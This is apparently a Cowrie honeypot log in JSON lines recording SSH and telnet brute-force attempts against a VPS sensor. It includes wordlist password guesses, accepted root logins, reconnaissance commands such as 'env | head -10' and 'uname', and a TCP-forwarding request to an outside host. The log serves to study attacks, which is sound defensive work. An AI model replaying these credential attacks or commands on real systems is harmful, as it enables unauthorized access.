{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33092,"dst_ip":"1.2.3.4","dst_port":23,"session":"9ef9be124036","protocol":"telnet","message":"New connection: 212.227.125.160:33092 (1.2.3.4:23) [session: 9ef9be124036]","sensor":"my-vps","timestamp":"2025-08-28T21:19:39.262058Z"}
{"eventid":"cowrie.session.closed","duration":0.14241266250610352,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:19:39.404403Z","src_ip":"212.227.125.160","session":"9ef9be124036"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53274,"dst_ip":"1.2.3.4","dst_port":22,"session":"443c820a5eee","protocol":"ssh","message":"New connection: 212.227.235.229:53274 (1.2.3.4:22) [session: 443c820a5eee]","sensor":"my-vps","timestamp":"2025-08-28T21:19:55.148055Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T21:20:02.411767Z","src_ip":"212.227.235.229","session":"443c820a5eee"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T21:20:02.412896Z","src_ip":"212.227.235.229","session":"443c820a5eee"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":53996,"dst_ip":"1.2.3.4","dst_port":22,"session":"93d5fe5dd37a","protocol":"ssh","message":"New connection: 80.94.95.15:53996 (1.2.3.4:22) [session: 93d5fe5dd37a]","sensor":"my-vps","timestamp":"2025-08-28T21:20:40.791635Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T21:20:40.792608Z","src_ip":"80.94.95.15","session":"93d5fe5dd37a"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T21:20:40.846619Z","src_ip":"80.94.95.15","session":"93d5fe5dd37a"}
{"eventid":"cowrie.login.failed","username":"tomas","password":"tomas","message":"login attempt [tomas/tomas] failed","sensor":"my-vps","timestamp":"2025-08-28T21:20:41.135399Z","src_ip":"80.94.95.15","session":"93d5fe5dd37a"}
{"eventid":"cowrie.login.failed","username":"tomas","password":"abc123","message":"login attempt [tomas/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T21:20:42.187817Z","src_ip":"80.94.95.15","session":"93d5fe5dd37a"}
{"eventid":"cowrie.login.failed","username":"tomas","password":"abcd123","message":"login attempt [tomas/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-28T21:20:43.245247Z","src_ip":"80.94.95.15","session":"93d5fe5dd37a"}
{"eventid":"cowrie.login.failed","username":"tomas","password":"abcd1234","message":"login attempt [tomas/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-28T21:20:44.298538Z","src_ip":"80.94.95.15","session":"93d5fe5dd37a"}
{"eventid":"cowrie.login.failed","username":"tomas","password":"abc1234","message":"login attempt [tomas/abc1234] failed","sensor":"my-vps","timestamp":"2025-08-28T21:20:45.352015Z","src_ip":"80.94.95.15","session":"93d5fe5dd37a"}
{"eventid":"cowrie.session.closed","duration":"5.6","message":"Connection lost after 5.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:20:46.407024Z","src_ip":"80.94.95.15","session":"93d5fe5dd37a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":26650,"dst_ip":"1.2.3.4","dst_port":22,"session":"cbe734384e2b","protocol":"ssh","message":"New connection: 212.227.235.229:26650 (1.2.3.4:22) [session: cbe734384e2b]","sensor":"my-vps","timestamp":"2025-08-28T21:20:47.404545Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:20:47.405704Z","src_ip":"212.227.235.229","session":"cbe734384e2b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":27020,"dst_ip":"1.2.3.4","dst_port":22,"session":"0ed32d4916c5","protocol":"ssh","message":"New connection: 212.227.235.229:27020 (1.2.3.4:22) [session: 0ed32d4916c5]","sensor":"my-vps","timestamp":"2025-08-28T21:20:47.504690Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T21:20:47.505645Z","src_ip":"212.227.235.229","session":"0ed32d4916c5"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-28T21:20:47.636656Z","src_ip":"212.227.235.229","session":"0ed32d4916c5"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T21:20:48.031609Z","src_ip":"212.227.235.229","session":"0ed32d4916c5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-28T21:20:48.164961Z","session":"0ed32d4916c5"}
{"eventid":"cowrie.login.success","username":"root","password":"1234!","message":"login attempt [root/1234!] succeeded","sensor":"my-vps","timestamp":"2025-08-28T21:20:54.230597Z","src_ip":"212.227.235.229","session":"443c820a5eee"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T21:21:41.023527Z","src_ip":"212.227.235.229","session":"443c820a5eee"}
{"eventid":"cowrie.command.input","input":"env | head -10","message":"CMD: env | head -10","sensor":"my-vps","timestamp":"2025-08-28T21:21:41.024176Z","src_ip":"212.227.235.229","session":"443c820a5eee"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45784,"dst_ip":"1.2.3.4","dst_port":22,"session":"6de7ec52e220","protocol":"ssh","message":"New connection: 212.227.235.229:45784 (1.2.3.4:22) [session: 6de7ec52e220]","sensor":"my-vps","timestamp":"2025-08-28T21:21:42.387145Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T21:21:42.387968Z","src_ip":"212.227.235.229","session":"6de7ec52e220"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T21:21:42.664922Z","src_ip":"212.227.235.229","session":"6de7ec52e220"}
{"eventid":"cowrie.login.success","username":"root","password":"104120","message":"login attempt [root/104120] succeeded","sensor":"my-vps","timestamp":"2025-08-28T21:21:43.500285Z","src_ip":"212.227.235.229","session":"6de7ec52e220"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T21:21:44.067152Z","src_ip":"212.227.235.229","session":"6de7ec52e220"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-28T21:21:44.067983Z","src_ip":"212.227.235.229","session":"6de7ec52e220"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:21:44.345036Z","src_ip":"212.227.235.229","session":"6de7ec52e220"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:21:44.346193Z","src_ip":"212.227.235.229","session":"6de7ec52e220"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/54b13bf37f0f1c6d20bb831acb4d4856be1e90f0be7953c3660ae0d32d775d3b","size":28,"shasum":"54b13bf37f0f1c6d20bb831acb4d4856be1e90f0be7953c3660ae0d32d775d3b","duplicate":true,"duration":"14.8","message":"Closing TTY Log: var/lib/cowrie/tty/54b13bf37f0f1c6d20bb831acb4d4856be1e90f0be7953c3660ae0d32d775d3b after 14.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:21:55.851032Z","src_ip":"212.227.235.229","session":"443c820a5eee"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:21:57.504455Z","src_ip":"212.227.235.229","session":"0ed32d4916c5"}
{"eventid":"cowrie.session.closed","duration":"131.9","message":"Connection lost after 131.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:22:07.095898Z","src_ip":"212.227.235.229","session":"443c820a5eee"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38962,"dst_ip":"1.2.3.4","dst_port":23,"session":"679d2468f821","protocol":"telnet","message":"New connection: 212.227.235.229:38962 (1.2.3.4:23) [session: 679d2468f821]","sensor":"my-vps","timestamp":"2025-08-28T21:22:07.308578Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38916,"dst_ip":"1.2.3.4","dst_port":23,"session":"4e86d99e06a4","protocol":"telnet","message":"New connection: 212.227.235.229:38916 (1.2.3.4:23) [session: 4e86d99e06a4]","sensor":"my-vps","timestamp":"2025-08-28T21:22:07.552263Z"}
{"eventid":"cowrie.session.closed","duration":10.185473680496216,"message":"Connection lost after 10 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:22:17.493953Z","src_ip":"212.227.235.229","session":"679d2468f821"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33646,"dst_ip":"1.2.3.4","dst_port":23,"session":"20e41728822b","protocol":"telnet","message":"New connection: 212.227.235.229:33646 (1.2.3.4:23) [session: 20e41728822b]","sensor":"my-vps","timestamp":"2025-08-28T21:22:17.689891Z"}
{"eventid":"cowrie.session.closed","duration":0.20618391036987305,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:22:17.895995Z","src_ip":"212.227.235.229","session":"20e41728822b"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":62084,"dst_ip":"1.2.3.4","dst_port":22,"session":"dcaf22727e6b","protocol":"ssh","message":"New connection: 217.72.205.35:62084 (1.2.3.4:22) [session: dcaf22727e6b]","sensor":"my-vps","timestamp":"2025-08-28T21:22:31.186406Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:22:31.187644Z","src_ip":"217.72.205.35","session":"dcaf22727e6b"}
{"eventid":"cowrie.session.closed","duration":31.33074164390564,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:22:38.882932Z","src_ip":"212.227.235.229","session":"4e86d99e06a4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32944,"dst_ip":"1.2.3.4","dst_port":22,"session":"55ec19d6a7c7","protocol":"ssh","message":"New connection: 212.227.235.229:32944 (1.2.3.4:22) [session: 55ec19d6a7c7]","sensor":"my-vps","timestamp":"2025-08-28T21:22:48.249777Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T21:22:48.250547Z","src_ip":"212.227.235.229","session":"55ec19d6a7c7"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T21:22:48.355940Z","src_ip":"212.227.235.229","session":"55ec19d6a7c7"}
{"eventid":"cowrie.login.success","username":"root","password":"eve","message":"login attempt [root/eve] succeeded","sensor":"my-vps","timestamp":"2025-08-28T21:22:48.674039Z","src_ip":"212.227.235.229","session":"55ec19d6a7c7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T21:22:48.900399Z","src_ip":"212.227.235.229","session":"55ec19d6a7c7"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T21:22:48.901084Z","src_ip":"212.227.235.229","session":"55ec19d6a7c7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:22:49.008007Z","src_ip":"212.227.235.229","session":"55ec19d6a7c7"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:22:49.009181Z","src_ip":"212.227.235.229","session":"55ec19d6a7c7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60444,"dst_ip":"1.2.3.4","dst_port":23,"session":"2fa57c093c07","protocol":"telnet","message":"New connection: 212.227.235.229:60444 (1.2.3.4:23) [session: 2fa57c093c07]","sensor":"my-vps","timestamp":"2025-08-28T21:23:56.405507Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-28T21:23:58.377342Z","src_ip":"212.227.235.229","session":"2fa57c093c07"}
{"eventid":"cowrie.session.closed","duration":4.345355987548828,"message":"Connection lost after 4 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:24:00.750793Z","src_ip":"212.227.235.229","session":"2fa57c093c07"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60458,"dst_ip":"1.2.3.4","dst_port":23,"session":"a092c4fa7b6c","protocol":"telnet","message":"New connection: 212.227.235.229:60458 (1.2.3.4:23) [session: a092c4fa7b6c]","sensor":"my-vps","timestamp":"2025-08-28T21:24:00.978265Z"}
{"eventid":"cowrie.session.closed","duration":1.723557472229004,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:24:02.701748Z","src_ip":"212.227.235.229","session":"a092c4fa7b6c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54632,"dst_ip":"1.2.3.4","dst_port":23,"session":"1a96fca9528a","protocol":"telnet","message":"New connection: 212.227.235.229:54632 (1.2.3.4:23) [session: 1a96fca9528a]","sensor":"my-vps","timestamp":"2025-08-28T21:24:02.917558Z"}
{"eventid":"cowrie.login.success","username":"root","password":"icatch99","message":"login attempt [root/icatch99] succeeded","sensor":"my-vps","timestamp":"2025-08-28T21:24:03.524645Z","src_ip":"212.227.235.229","session":"1a96fca9528a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T21:24:03.540881Z","src_ip":"212.227.235.229","session":"1a96fca9528a"}
{"eventid":"cowrie.command.input","input":"echo SCANNER_TEST","message":"CMD: echo SCANNER_TEST","sensor":"my-vps","timestamp":"2025-08-28T21:24:03.800070Z","src_ip":"212.227.235.229","session":"1a96fca9528a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","size":492,"shasum":"f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","duplicate":true,"duration":"3.0","message":"Closing TTY Log: var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:24:06.556233Z","src_ip":"212.227.235.229","session":"1a96fca9528a"}
{"eventid":"cowrie.session.closed","duration":3.6419942378997803,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:24:06.559475Z","src_ip":"212.227.235.229","session":"1a96fca9528a"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":58496,"dst_ip":"1.2.3.4","dst_port":22,"session":"53208c44afaa","protocol":"ssh","message":"New connection: 80.94.95.15:58496 (1.2.3.4:22) [session: 53208c44afaa]","sensor":"my-vps","timestamp":"2025-08-28T21:24:35.319753Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T21:24:35.320697Z","src_ip":"80.94.95.15","session":"53208c44afaa"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T21:24:35.372038Z","src_ip":"80.94.95.15","session":"53208c44afaa"}
{"eventid":"cowrie.login.failed","username":"joyce","password":"7777777","message":"login attempt [joyce/7777777] failed","sensor":"my-vps","timestamp":"2025-08-28T21:24:35.660772Z","src_ip":"80.94.95.15","session":"53208c44afaa"}
{"eventid":"cowrie.login.failed","username":"joyce","password":"abc123","message":"login attempt [joyce/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T21:24:36.716237Z","src_ip":"80.94.95.15","session":"53208c44afaa"}
{"eventid":"cowrie.login.failed","username":"joyce","password":"abcd123","message":"login attempt [joyce/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-28T21:24:37.772940Z","src_ip":"80.94.95.15","session":"53208c44afaa"}
{"eventid":"cowrie.login.failed","username":"joyce","password":"abcd1234","message":"login attempt [joyce/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-28T21:24:38.827975Z","src_ip":"80.94.95.15","session":"53208c44afaa"}
{"eventid":"cowrie.login.failed","username":"joyce","password":"abc1234","message":"login attempt [joyce/abc1234] failed","sensor":"my-vps","timestamp":"2025-08-28T21:24:39.881939Z","src_ip":"80.94.95.15","session":"53208c44afaa"}
{"eventid":"cowrie.session.closed","duration":"5.6","message":"Connection lost after 5.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:24:40.936279Z","src_ip":"80.94.95.15","session":"53208c44afaa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44842,"dst_ip":"1.2.3.4","dst_port":22,"session":"74fe8eb9b246","protocol":"ssh","message":"New connection: 212.227.125.160:44842 (1.2.3.4:22) [session: 74fe8eb9b246]","sensor":"my-vps","timestamp":"2025-08-28T21:25:10.709150Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T21:25:12.385953Z","src_ip":"212.227.125.160","session":"74fe8eb9b246"}
